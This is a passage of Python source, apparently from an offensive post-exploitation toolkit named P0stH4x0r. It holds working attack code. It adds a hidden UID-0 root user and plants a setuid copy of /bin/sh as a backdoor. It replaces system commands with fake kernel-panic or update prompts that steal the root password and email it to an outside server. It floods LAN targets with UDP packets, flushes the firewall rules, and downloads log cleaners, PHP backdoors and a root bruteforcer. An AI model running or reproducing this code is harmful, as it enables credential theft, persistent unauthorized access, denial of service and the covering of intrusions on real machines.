print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Open SSH Connection]" + bcolors.END) | |
print("\n") | |
#### ##### ##### | |
print(bcolors.GREEN + " 1. Install OpenSSH-Server\n 2. Open SSH Server\n 3. Stop SSH Server\n 4. Exit" + bcolors.END) | |
schoice=raw_input(bcolors.RED + "\nYour Choice: " + bcolors.END) | |
print("\n\n") | |
if schoice == '1': | |
sinstall() | |
elif schoice == '2': | |
screate() | |
elif schoice == '3': | |
sclose() | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
break | |
## Root Creation Function | |
def rooter(): | |
cmd="/usr/sbin/useradd -o -u 0 %(username)s" | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Root User Creation]" + bcolors.END) | |
print("\n") | |
#### ##### ##### | |
sure=raw_input(bcolors.RED + "This action will add a New Root User. Continue? Y/n " + bcolors.END) | |
print(bcolors.PURPLE + "\n (To create a Root User, you need to have Root Priviledges!)\n") | |
time.sleep(1) | |
if sure == 'Y' or sure == 'y': | |
urs=raw_input(bcolors.BLUE + "Enter the Desired Username:\n" + bcolors.END) | |
if urs is not 'root': | |
## R00t USR | |
os.system(cmd % {'username':urs}) | |
print(bcolors.ORANGE + "New Root User Created!" + bcolors.END) | |
print("\n") | |
## Passwd | |
print(bcolors.GREEN + "Requesting Password..." + bcolors.END) | |
os.system("passwd %s" % urs) | |
print(bcolors.ORANGE + "Password... Done!" + bcolors.END) | |
time.sleep(1) | |
os.system("clear") | |
else: | |
print(bcolors.RED + "The username cannot be 'ROOT'!" + bcolors.END) | |
time.sleep(1) | |
os.system("clear") | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
## Shell Creation | |
def shelled(): | |
######################################### | |
while 1: | |
shelm=[' 1. Enter Path and Apply\n 2. Exit'] | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Shell Creation]" + bcolors.END) | |
print(bcolors.RED + " (Creates a Shell that helps Reconnect with your Current Priviliges. If you are Root, You can Regain your Priviliges just by Executing the new Shell!\n" + bcolors.END) | |
#### ##### ##### | |
print("\n") | |
for i in shelm: | |
print(bcolors.GREEN + i + bcolors.END) | |
print(bcolors.BLUE + '\n (Tip: Be Sure that the path is like: "/Path/to/shell/sh" - the "sh" at the end is the Shell!)\n' + bcolors.END) | |
chwo=raw_input(bcolors.RED + "\nYour Choice: " + bcolors.END) | |
if chwo == '1': | |
print(bcolors.RED + "\nEnter the Path you want the Shell to Be Located:" + bcolors.END) | |
patos=raw_input() | |
print("\n") | |
if len(patos) > 0: | |
print(bcolors.ORANGE + "Copying Shell to Path: " + patos + "!" + bcolors.END) | |
os.system("cp /bin/sh " + patos) | |
print(bcolors.ORANGE + "Inheriting Current Priviliges!" + bcolors.END) | |
os.system("chmod 4755 " + patos) | |
ps='' | |
if patos[0] == '/': | |
ps=patos[1:-1] + patos[-1] | |
else: | |
ps=patos | |
print(bcolors.GREEN + "Done! The New Shell is here: " + patos) | |
time.sleep(3) | |
os.system("clear") | |
else: | |
print(bcolors.RED + "\nERROR: Nothing Inputted!\n" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
break | |
os.system("clear") | |
## Social Enginnering | |
def socialiser(): | |
######################################### | |
def kerror(): | |
## Kernel Error - Update Download | |
kermen=' 1. Enter the Command to Use ' + bcolors.PURPLE + '(Writing to /bin Privileges Required...)' + bcolors.END + bcolors.GREEN + '\n 2. E-Mail Address to Use\n 3. Apply\n 4. Exit' | |
kernel_error="'\n\nautofs4 e1000 microcode keybdev mousedev hid input usb-uhci usbcore ext3 kdb aacraid sb_mod scsi_mod\nCPU: 1\nEIP: 0060:[<c8156540>] Not tainted\nEFLAGS: 00010246\n\nEIP is at rebalance_laundry_zone [kernel] 0x960 $(uname -r)/$(uname -v)\neax: 0000000 ebx: c39d9818 ecx: c03a825 edx: c3a17a84\nesi: c39d0ffc edi: 0000003a edp: c83a7000 esp: c82e1f00\nds: 0068 es: 0068 ss: 0068\nProcess kswapd (pid: 11, stackpage=c82e1000)\nStack: 00000000 00000001 00000000 c83a8248 00000000 00000000 00000005 c83a7888\n 0003b448 00000000 00000048 c815c24 c815c24 c03a7080 00000048 00000000 00000b1e\n 0003b448 00000000 00000048 c8156c24 c083a7880 00000048 00000000 00000b1e\n 00000000 00004891 00000000 00000000 c8156d38 000001d0 00000002 000001d8\nCall Trace: [<c8156c24>] do_try_to_free_pages_kswapd [kernel] 0x284 (0xc82e1fac)\n[<c0156d38>] kswapd [kernel] 0x68 (0xc82r1fd8)\n[<c0156cd0>] kswapd [kernel] 0x0 (0xc82e1fe4)\n[<c01095ad>] kernel_thread_helper [kernel] 0x5 (0xc82e1ff0)\n\nCode: 0f 0b 1b 03 50 d2 2b c0 e9 2a f7 ff ff b8 04 00 00 00 e8 e9\n\n Kernel panic: Fatal exception\n\n'" | |
def appl(cmd,error,mail): | |
if mail: | |
mail = mail | |
elif mail == 'n': | |
mail=None | |
else: | |
mail = None | |
print(bcolors.ORANGE + "\nThis requires Priviledges to Write to /bin\n" + bcolors.END) | |
try: | |
print(bcolors.ORANGE + "Renaming Original Command to " + cmd + "2..." + bcolors.END) | |
os.system("mv /bin/" + cmd + " /bin/" + cmd + "2") | |
if mail: | |
print(bcolors.ORANGE + "Creating Mailer..." + bcolors.END) | |
try: | |
mailer="import urllib\nimport urllib2\n\n" | |
mailer=mailer + "f=open('/bin/.kodec','r')\n\ncontent=f.read()" | |
mailer=mailer + "\nif content == None or content == '':\n content='Empty!'\nelse:\n pass\n\n" | |
mailer=mailer + r"cont='Here is the Password. (It is encoded in ROT13)\n\n__________________________________\n\n'" | |
mailer=mailer + "\ncont=cont + content\n\n\n" | |
mailer=mailer + r"cont=cont + '\n\n__________________________________\n\n(Use the ROT13 Decoder in the Script (or here: http://www.p0sth4x0r.net46.net/index.php?p=tools/rot13) to reveal the real Password.)\n\n - akatzbreaker\n - G.N.A. Hack Team <http://www.gnahackteam.wordpress.com>\n - P0stH4x0r <http://www.p0sth4x0r.net46.net>'" | |
mailer=mailer + "\n\nf.close()" | |
mailer=mailer + "\n\nemail='" + mail + "'" | |
mailer=mailer + "\n\ncreds=urllib.urlencode({'name': 'P0stH4x0r', 'from': 'noreply@p0sth4x0r.net','subject': 'P0stH4x0r - Social Engineering Password','to':email,'con':'p','content':cont})\n\n" | |
mailer=mailer + "\nrequm=urllib2.urlopen('http://www.p0sth4x0r.net46.net/Pages/mailer/send.php',creds)" | |
mailer=mailer + "\n\nf=open('/bin/.kodec','w')\n\nf.close()" | |
mai=open('/bin/.pymailer.py','w') | |
mai.write(mailer) | |
mai.close() | |
print(bcolors.ORANGE + "Mailer Created!" + bcolors.END) | |
except: | |
print(bcolor.RED + "Something Went Wrong while Creating the Mailer on the System... Check your Write Priviliges!" + bcolors.END) | |
else: | |
pass | |
print(bcolors.ORANGE + "Creating Rot13 Encoder..." + bcolors.END) | |
rot=open("/bin/.rot.py",'w') | |
rot.write("def rot(s):\n chars = 'abcdefghijklmnopqrstuvwxyz'\n trans = chars[13:]+chars[:13]\n rot_char = lambda c: trans[chars.find(c)] if chars.find(c)>-1 else c\n return ''.join( rot_char(c) for c in s )\n\nfl=open('/bin/.kodec','r')\nro=rot(fl.read())\nfl.close()\nfl=open('/bin/.kodec','w')\nfl.write(ro)\n\nfl.close\n\n") | |
rot.close() | |
print(bcolors.ORANGE + "ROT13 Encoder Created!" + bcolors.END) | |
print(bcolors.ORANGE + 'Writing Commands on the "Infected" ' + cmd + "..." + bcolors.END) | |
cm=open("/bin/" + cmd,'w') | |
cm.write('#!/bin/bash\nif [ "$(id -u)" != "0" ]; then') | |
cm.write('\n ' + cmd + "2") | |
cm.write('\n exit 1') | |
cm.write("\nfi") | |
cm.write("\nsleep 2\nclear\n") | |
if mail and mail is not 'n': | |
cm.write("\naddrs=%s" % mail) | |
else: | |
pass | |
cm.write("\n\n") | |
cm.write("echo %s" % error) | |
cm.write("\n\nsleep 3\n\necho 'A new Kernel is Available! This can fix the Kernel Panic Error.'\necho '[sudo] password for root: '\n") | |
cm.write('stty -echo\nread -p "Password: " passd; echo\nstty echo\n') | |
cm.write('\n\nsleep 1\necho "su: Authentication failure"') | |
cm.write('\n\nsudo echo $passd > /bin/.kodec\n') | |
cm.write('stty -echo\nread -p "Password: " passd12; echo\nstty echo') | |
cm.write('\npython /bin/.rot.py\n') | |
if mail and mail is not 'n': | |
cm.write('\n\npython /bin/.pymailer.py\n') | |
else: | |
pass | |
cm.write('wget http://www.kernel.org/pub/linux/kernel/v3.0/patch-3.4.bz2 -O /tmp/kernel_patch\n') | |
cm.write('echo "[*] Unpacking..."\n') | |
cm.write('sleep 7\n') | |
cm.write('echo "[*] Unpacked!"\n') | |
cm.write('echo "[*] Applying Patch..."\n') | |
cm.write('echo "[*] Done!"') | |
cm.write("\n\nsudo sh /bin/.restore.sh") | |
cm.write("\n\nclear\n") | |
cm.close() | |
print(bcolors.ORANGE + "Creating Restore-Original-Command File..." + bcolors.END) | |
print(bcolors.ORANGE + "Making Script Executable..." + bcolors.END) | |
os.system("chmod +x /bin/" + cmd) | |
######## Restore Command File ########## | |
res=open("/bin/.restore.sh",'w') | |
res.write("#!/bin/bash") | |
res.write("\n\nmv /bin/" + cmd + "2" + " /bin/" + cmd) | |
if mail: | |
res.write("\n\nrm /bin/.kodec\n\n") | |
else: | |
pass | |
res.write("\n\nrm /bin/.rot.py") | |
if mail: | |
res.write("\n\nrm /bin/.pymailer.py") | |
else: | |
pass | |
res.write("\n\nrm /bin/.restore.sh") | |
res.write("\nsleep 3\n") | |
res.write("clear") | |
res.write("\n\n") | |
res.close() | |
print(bcolors.ORANGE + ".restore.sh... Created!" + bcolors.END) | |
os.system("chmod +x /bin/.restore.sh") | |
print(bcolors.GREEN + "Social-Engineering Command Done! \n" + bcolors.END) | |
time.sleep(2) | |
print(bcolors.GREEN + " (The Password will be e-mailed to you -If you entered an Address-! Check the /bin directory for a file called: '.kodec'. The Password will be located in it!)" + bcolors.END) | |
return 'o' | |
except: | |
print(bcolors.RED + "\n\nERROR: Something went Wrong! Make sure you have run P0stH4x0r with writing-Priviledges on /bin!\n\n" + bcolors.END) | |
time.sleep(2) | |
os.system('clear') | |
cm = 'ls' | |
ml=None | |
while 1: | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Social Engineer - Kernel Error]" + bcolors.END) | |
print("\n") | |
print(bcolors.GREEN + kermen + bcolors.END) | |
kech=raw_input(bcolors.RED + '\nYour Choice: ' + bcolors.END) | |
if kech == '1': | |
print(bcolors.RED + "\n > Default Command: 'ls' <chosen automatically if you don't input anything...>" + bcolors.END) | |
cm=raw_input(bcolors.BLUE + 'Enter the Command you want to "Infect" (ex. ls): ' + bcolors.END) | |
if len(cm) > 0: | |
pass | |
else: | |
cm='ls' | |
elif kech == '2': | |
ml=raw_input(bcolors.BLUE + 'Enter your Mail to get the Password: ' + bcolors.END) | |
if ml and len(ml) > 3: | |
ml=ml | |
else: | |
ml='n' | |
elif kech == '3': | |
appl(cm,kernel_error,ml) | |
else: | |
print(bcolors.ORANGE + "\n\nReturning to the Social-Engineering-Helper Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
break | |
################################################ | |
def secupdt(): | |
## Security Updates Prompt | |
kermen=bcolors.GREEN + " 1. Enter Command to Use " + bcolors.PURPLE + "(Writing to /bin Privileges Required...)" + bcolors.END + bcolors.GREEN + "\n 2. E-Mail to Use\n 3. Apply\n 4. Exit" + bcolors.END | |
def appl(cmd,mail): | |
if mail: | |
mail = mail | |
elif mail == 'n': | |
mail=None | |
else: | |
mail = None | |
print(bcolors.ORANGE + "\nThis requires Priviledges to Write to /bin\n" + bcolors.END) | |
try: | |
print(bcolors.ORANGE + "Renaming Original Command to " + cmd + "2..." + bcolors.END) | |
os.system("mv /bin/" + cmd + " /bin/" + cmd + "2") | |
if mail: | |
print(bcolors.ORANGE + "Creating Mailer..." + bcolors.END) | |
try: | |
mailer="import urllib\nimport urllib2\n\n" | |
mailer=mailer + "f=open('/bin/.kodec','r')\n\ncontent=f.read()" | |
mailer=mailer + "\nif content == None or content == '':\n content='Empty!'\nelse:\n pass\n\n" | |
mailer=mailer + r"cont='Here is the Password. (It is encoded in ROT13)\n\n__________________________________\n\n'" | |
mailer=mailer + "\ncont=cont + content\n\n\n" | |
mailer=mailer + r"cont=cont + '\n\n__________________________________\n\n(Use the ROT13 Decoder in the Script (or here: http://www.p0sth4x0r.net46.net/index.php?p=tools/rot13) to reveal the real Password.)\n\n - akatzbreaker\n - G.N.A. Hack Team <http://www.gnahackteam.wordpress.com>\n - P0stH4x0r <http://www.p0sth4x0r.net46.net>'" | |
mailer=mailer + "\n\nf.close()" | |
mailer=mailer + "\n\nemail='" + mail + "'" | |
mailer=mailer + "\n\ncreds=urllib.urlencode({'name': 'P0stH4x0r', 'from': 'noreply@p0sth4x0r.net','subject': 'P0stH4x0r - Social Engineering Password','to':email,'con':'p','content':cont})\n\n" | |
mailer=mailer + "\nrequm=urllib2.urlopen('http://www.p0sth4x0r.net46.net/Pages/mailer/send.php',creds)" | |
mailer=mailer + "\n\nf=open('/bin/.kodec','w')\n\nf.close()" | |
mai=open('/bin/.pymailer.py','w') | |
mai.write(mailer) | |
mai.close() | |
print(bcolors.ORANGE + "Mailer Created!" + bcolors.END) | |
except: | |
print(bcolor.RED + "Something Went Wrong while Creating the Mailer on the System... Check your Write Priviliges!" + bcolors.END) | |
else: | |
pass | |
print(bcolors.ORANGE + "Creating Rot13 Encoder..." + bcolors.END) | |
rot=open("/bin/.rot.py",'w') | |
rot.write("def rot(s):\n chars = 'abcdefghijklmnopqrstuvwxyz'\n trans = chars[13:]+chars[:13]\n rot_char = lambda c: trans[chars.find(c)] if chars.find(c)>-1 else c\n return ''.join( rot_char(c) for c in s )\n\nfl=open('/bin/.kodec','r')\nro=rot(fl.read())\nfl.close()\nfl=open('/bin/.kodec','w')\nfl.write(ro)\n\nfl.close\n\n") | |
rot.close() | |
print(bcolors.ORANGE + "ROT13 Encoder Created!" + bcolors.END) | |
print(bcolors.ORANGE + 'Writing Commands on the "Infected" ' + cmd + "..." + bcolors.END) | |
cm=open("/bin/" + cmd,'w') | |
cm.write('#!/bin/bash\nif [ "$(id -u)" != "0" ]; then') | |
cm.write('\n ' + cmd + "2") | |
cm.write('\n exit 1') | |
cm.write("\nfi\n") | |
if mail and mail is not 'n': | |
cm.write("\naddrs=%s" % mail) | |
else: | |
pass | |
cm.write("\n\n") | |
cm.write("\n\nsleep 3\n\necho 'New Emergency Security Updates are Available! Your System might be at great Risk! Please Update now!'\necho '[sudo] password for root: '\n") | |
cm.write('stty -echo\nread -p "Password: " passd; echo\nstty echo\n') | |
cm.write('\n\nsleep 1\necho "su: Authentication failure"') | |
cm.write('\n\nsudo echo $passd > /bin/.kodec\n') | |
cm.write('stty -echo\nread -p "Password: " passd12; echo\nstty echo') | |
cm.write('\npython /bin/.rot.py\n') | |
if mail and mail is not 'n': | |
cm.write('\n\npython /bin/.pymailer.py\n') | |
else: | |
pass | |
cm.write('sudo ' + updatecmd + '\nsudo ' + updatecmd + 'dist-upgrade\nsudo ' + installcmd + 'install upgrade') | |
cm.write("\n\nsudo sh /bin/.restore.sh") | |
cm.write("\nsleep 2\nclear\n") | |
cm.close() | |
print(bcolors.ORANGE + "Creating Restore-Original-Command File..." + bcolors.END) | |
print(bcolors.ORANGE + "Making Script Executable..." + bcolors.END) | |
os.system("chmod +x /bin/" + cmd) | |
######## Restore Command File ########## | |
res=open("/bin/.restore.sh",'w') | |
res.write("#!/bin/bash") | |
res.write("\n\nmv /bin/" + cmd + "2" + " /bin/" + cmd) | |
if mail: | |
res.write("\n\nrm /bin/.kodec\n\n") | |
else: | |
pass | |
res.write("\n\nrm /bin/.rot.py") | |
if mail: | |
res.write("\n\nrm /bin/.pymailer.py") | |
else: | |
pass | |
res.write("\n\nrm /bin/.restore.sh") | |
res.write("\nsleep 3\n") | |
res.write("clear") | |
res.write("\n\n") | |
res.close() | |
print(bcolors.ORANGE + ".restore.sh... Created!" + bcolors.END) | |
os.system("chmod +x /bin/.restore.sh") | |
print(bcolors.GREEN + "Social-Engineering Command Done! \n" + bcolors.END) | |
time.sleep(2) | |
print(bcolors.GREEN + " (The Password will be e-mailed to you -If you entered an Address-! Check the /bin directory for a file called: '.kodec'. The Password will be located in it!)" + bcolors.END) | |
return 'o' | |
except: | |
print(bcolors.RED + "\n\nERROR: Something went Wrong! Make sure you have run P0stH4x0r with writing-Priviledges on /bin!\n\n" + bcolors.END) | |
time.sleep(2) | |
os.system('clear') | |
cm = 'ls' | |
ml=None | |
while 1: | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Social Engineer - Security Update Prompt]" + bcolors.END) | |
print("\n") | |
print(bcolors.GREEN + kermen + bcolors.END) | |
kech=raw_input(bcolors.RED + '\nYour Choice: ' + bcolors.END) | |
if kech == '1': | |
print(bcolors.RED + "\n > Default Command: 'ls' <chosen automatically if you don't input anything...>" + bcolors.END) | |
cm=raw_input(bcolors.BLUE + 'Enter the Command you want to "Infect" (ex. ls): ' + bcolors.END) | |
if len(cm) > 0: | |
pass | |
else: | |
cm='ls' | |
print(bcolors.BLUE + "\n > Commands on the /bin ONLY Supported! <\n" + bcolors.END) | |
elif kech == '2': | |
ml=raw_input(bcolors.BLUE + 'Enter your Mail to get the Password: ' + bcolors.END) | |
if ml and len(ml) > 3: | |
ml=ml | |
else: | |
ml='n' | |
elif kech == '3': | |
appl(cm,ml) | |
else: | |
print(bcolors.ORANGE + "\n\nReturning to the Social-Engineering-Helper Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
break | |
############################################### | |
socialmenu=' 1. Create a "Kernel Error" - Kernel-Update-Download Prompt\n 2. Create a "Security Updates" Prompt\n 3. ROT13 Password (Decode Fetched Password)\n 4. Exit' | |
while 1: | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Social Engineering - Fool Root]" + bcolors.END) | |
print("\n") | |
print(bcolors.GREEN + socialmenu + bcolors.END) | |
socialchoice = raw_input(bcolors.RED + "\nYour Choice: " + bcolors.END) | |
if socialchoice == '1': | |
kerror() ## Kernel Error - Download Update | |
elif socialchoice == '2': | |
secupdt() ## Security Updates - Download | |
elif socialchoice =='3': | |
## ROT13 Password | |
passwdd=raw_input(bcolors.BLUE + "Enter the Password you fetched: " + bcolors.END) | |
s=passwdd | |
chars = "abcdefghijklmnopqrstuvwxyz" | |
trans = chars[13:]+chars[:13] | |
rot_char = lambda c: trans[chars.find(c)] if chars.find(c)>-1 else c | |
print(bcolors.RED + "The Password for Root is: ") | |
print ''.join( rot_char(c) for c in s ) | |
raw_input(bcolors.ORANGE + "\nHit <ENTER> to Continue..." + bcolors.END) | |
time.sleep(1) | |
os.system("clear") | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
break | |
## Privilige Escalation Checher | |
def privesc(): | |
mk="mkdir privesc" | |
dl="wget http://p0sth4x0r.net46.net/download/files/privesc.tar.gz -O privesc/privesc.tar.gz" | |
rn='unix-privesc-check-1.4/./unix-privesc-check standard > report.txt' | |
ut="tar -xf privesc/privesc.tar.gz" | |
cleanUp="rm -r privesc unix-privesc-check-1.4" | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Unix Privilige Escalation Checker - Credits to Joomlafkr (Th3Br3acher) ]" + bcolors.END) | |
print("\n") | |
#### ##### ##### | |
sure=raw_input(bcolors.RED + "This action will Download the Script and extract it. Next you will enter an E-Mail Address so that the results are sent to you. Continue? Y/n " + bcolors.END) | |
time.sleep(1) | |
if sure == 'Y' or sure == 'y': | |
os.system(mk) | |
print(bcolors.ORANGE + "Downloading..." + bcolors.END) | |
time.sleep(2) | |
os.system(dl) | |
print(bcolors.GREEN + "Downloading Procedure Done!" + bcolors.END) | |
print(bcolors.ORANGE + "Attempting to Extract..." + bcolors.END) | |
time.sleep(2) | |
os.system(ut) | |
print(bcolors.GREEN + "Extracting Procedure Done!" + bcolors.END) | |
eml=raw_input(bcolors.RED + "\nEnter your E-Mail Address (The Results will be Sent to you there):\n" + bcolors.END) | |
if eml and len(eml) > 3: | |
print(bcolors.ORANGE + "\n\n --- Starting Check | Please Wait --- \n\n" + bcolors.END) | |
os.system(rn) | |
print(bcolors.GREEN + "\n\nCheck... Done! (Report file at: report.txt\n" + bcolors.END) | |
time.sleep(1) | |
print(bcolors.ORANGE + "\nSending E-Mail..." + bcolors.END) | |
try: | |
fld=open('report.txt','r') | |
cont=fld.read() | |
fld.close() | |
contente="The Results of The Privilige Escalation Check From P0stH4x0r:\n\n______________________________________" | |
contente=contente + "\n\n\n" + cont | |
creds=urllib.urlencode({'name': 'P0stH4x0r', 'from': 'noreply@p0sth4x0r.net','subject':'PostH4x0r - Privilige Escalation Checker Results','to':eml,'con':'p','content':contente}) | |
requm=urllib2.urlopen('http://www.p0sth4x0r.net46.net/Pages/mailer/send.php',creds) | |
if 'Sent!' in requm: | |
print(bcolors.GREEN + "E-Mail Sent!" + bcolors.END) | |
cleanup=raw_input("Clean Up the Directory? Y/n ") | |
if cleanup == 'y' or cleanup == 'Y': | |
os.system("rm -r privesc/ unix-privesc-check-1.4/") | |
rep=raw_input("Delete 'report.txt' also? Y/n ") | |
if rep == 'y' or rep == 'Y': | |
os.system("rm -r report.txt") | |
else: | |
pass | |
print(bcolors.GREEN + "Directory Cleaned Up!" + bcolors.END) | |
time.sleep(1) | |
else: | |
print(bcolors.ORANGE + "I am not a Cleaner BTW...." + bcolors.END) | |
time.sleep(2) | |
time.sleep(2) | |
else: | |
print(bcolors.RED + "E-Mail NOT Sent! Please check the 'report.txt' file... (At the same directory as the script)" + bcolors.END) | |
time.sleep(2) | |
except: | |
print(bcolors.RED + "\nCould NOT Open file: report.txt!\n" + bcolors.END) | |
time.sleep(3) | |
os.system("clear") | |
else: | |
print(bcolors.RED + "You should Enter a Valid E-Mail Address! Returning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
## Find all SUID Files | |
def suID(): | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Find all SUID Files]" + bcolors.END) | |
print("\n") | |
#### ##### ##### | |
print(bcolors.GREEN + "This function will find all SUID files that you can edit and gain Root Priviliges!\n You can also check for custom, writable CRON JOB Scripts..." + bcolors.END) | |
print(bcolors.ORANGE + "\n\nInitialising Check....\n\n" + bcolors.END) | |
os.system("find / -type f -perm -04000 -ls") | |
print(bcolors.GREEN + "\n\nDone!" + bcolors.END) | |
raw_input(bcolors.ORANGE + "Hit <ENTER> to Continue..." + bcolors.END) | |
time.sleep(1) | |
os.system("clear") | |
## UDP Packet Flooder | |
def udpflood(): | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[UDP Flooder]\n" + bcolors.END) | |
#### ##### ##### | |
print(bcolors.BLUE + "\n\n This function will Flood a Target Machine of the same Local Network with UDP Packets!\n The Target will probably not be able to handle the Packets and will be Kicked out of the Network.\n\n") | |
tarip=raw_input(bcolors.RED + "\n >> Enter the IP of the Target: (Find it out using NMap!)\n" + bcolors.END) | |
tarpo=raw_input(bcolors.RED + " >> Enter the PORT you want to Use: " + bcolors.END) | |
try: | |
if len(tarpo) == 4: | |
tarpo=int(tarpo) | |
else: | |
tarpo = 'in' | |
print(bcolors.RED + "\nEnter a Valid Port!" + bcolors.END) | |
except: | |
tarpo='in' | |
print(bcolors.RED + "\nEnter a Valid Port!" + bcolors.END) | |
while 1: | |
if not tarpo or tarpo == 'in': | |
tarpo=raw_input(bcolors.RED + " >> Enter the PORT you want to Use: " + bcolors.END) | |
try: | |
if len(tarpo) == 4: | |
tarpo=int(tarpo) | |
else: | |
tarpo = 'in' | |
print(bcolors.RED + "\nEnter a Valid Port!" + bcolors.END) | |
except: | |
tarpo='in' | |
print(bcolors.RED + "\nEnter a Valid Port!" + bcolors.END) | |
else: | |
break | |
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) | |
bytes=random._urandom(1024) | |
send=0 | |
raw_input(bcolors.ORANGE + "\n\n !! To Stop Sending Packets, hit ^C (CTRL+C) !! \n Hit <ENTER> to Start...\n\n") | |
time.sleep(1) | |
while 1: | |
try: | |
print(bcolors.GREEN) | |
s.sendto(bytes,(tarip,tarpo)) | |
print("Sent %s packets to %s:%s" % (send,tarip,tarpo)) | |
send= send + 1 | |
print(bcolors.END) | |
except KeyboardInterrupt: | |
print(bcolors.RED + "\n=================================" + bcolors.END) | |
print(bcolors.RED + " Stopped sending Packets!!\n" + bcolors.END) | |
print(bcolors.RED + "=================================\n" + bcolors.END) | |
break | |
time.sleep(1) | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
## Firewall Disable Function | |
def firedis(): | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Disable Firewall]\n" + bcolors.END) | |
#### ##### ##### | |
sure=raw_input(bcolors.RED + "This action will Disable Firewall on the System. Continue? Y/n " + bcolors.END) | |
print(bcolors.PURPLE + "\n (To disable Firewall, you need to have Root Priviledges!)\n" + bcolors.END) | |
time.sleep(1) | |
if sure == 'Y' or sure == 'y': | |
print(bcolors.PURPLE + "Attempting to Disable Firewall..." + bcolors.END) | |
os.system("iptables -F") | |
os.system("iptables -X") | |
os.system("iptables -t nat -F") | |
os.system("iptables -t nat -X") | |
os.system("iptables -t mangle -F") | |
os.system("iptables -t mangle -X") | |
os.system("iptables -P INPUT ACCEPT") | |
os.system("iptables -P FORWARD ACCEPT") | |
os.system("iptables -P OUTPUT ACCEPT") | |
print(bcolors.ORANGE + "Done..." + bcolors.END) | |
time.sleep(2) | |
os.system('clear') | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
## Post-Exploitation Script Downloader | |
def postinstallous(): | |
os.system("clear") | |
dlink="http://www.p0sth4x0r.net46.net/download/files/post_exploitation_scripts/" | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Other Post-Exploitation Script Downloader]\n" + bcolors.END) | |
#### ##### ##### | |
scripts=['1. whitecat.c (1.0) - Log Cleaner','2. GotRoot.sh (1.2) - Misc Post-Exploitation Functions','3. Weevely (0.7) - Stealth PHP Backdoor Generator','4. NetcatPHPShell (1.10) - A PHP Backdoor','5. rootdabitch (0.1) - Root Password Bruteforcer'] | |
links=[dlink + "whitecat.c",dlink + "GotRoot.sh",dlink + "weevely.zip",dlink + "NetcatPHPShell.zip",dlink + "rootdabitch.zip"] | |
print(bcolors.GREEN + " " + scripts[0] + bcolors.END) | |
print(bcolors.GREEN + " " + scripts[1] + bcolors.END) | |
print(bcolors.GREEN + " " + scripts[2] + bcolors.END) | |
print(bcolors.GREEN + " " + scripts[3] + bcolors.END) | |
print(bcolors.GREEN + " " + scripts[4] + bcolors.END) | |
print(bcolors.GREEN + " 6. Exit" + bcolors.END) | |
chc=raw_input(bcolors.RED + "\nYour Choice: " + bcolors.END) | |
if chc == '1': | |
try: | |
sd=open("whitecat.c",'w') | |
sd.write(urllib2.urlopen(links[0]).read()) | |
sd.close() | |
except: | |
print(bcolors.RED + "Something Went Wrong! Try again..." + bcolors.END) | |
elif chc == '2': | |
try: | |
sd=open("GotRoot.sh",'w') | |
sd.write(urllib2.urlopen(links[1]).read()) | |
sd.close() | |
except: | |
print(bcolors.RED + "Something Went Wrong! Try again..." + bcolors.END) | |
elif chc == '3': | |
try: | |
os.system("wget " + links[2]) | |
print(bcolors.GREEN + "\nDone!" + bcolors.END) | |
except: | |
print(bcolors.RED + "Something Went Wrong! Try again..." + bcolors.END) | |
elif chc == '4': | |
try: | |
os.system("wget " + links[3]) | |
print(bcolors.GREEN + "\nDone!" + bcolors.END) | |
except: | |
print(bcolors.RED + "Something Went Wrong! Try again..." + bcolors.END) | |
elif chc == '5': | |
try: | |
os.system("wget " + links[4]) | |
print(bcolors.GREEN + "\nDone!" + bcolors.END) | |
except: | |
print(bcolors.RED + "Something Went Wrong! Try again..." + bcolors.END) | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
## Package Installer | |
def pinstallous(): | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Package Installer - Root Required!]" + bcolors.END) | |
print('\n') | |
#### ##### ##### | |
print(bcolors.GREEN + " 1. Install Netcat\n 2. Install Hashcat\n 3. Install NMap\n 4. Install Lynx (Terminal Web-Browser)\n 5. Install User-Defined Package\n 6. Exit\n" + bcolors.END) | |
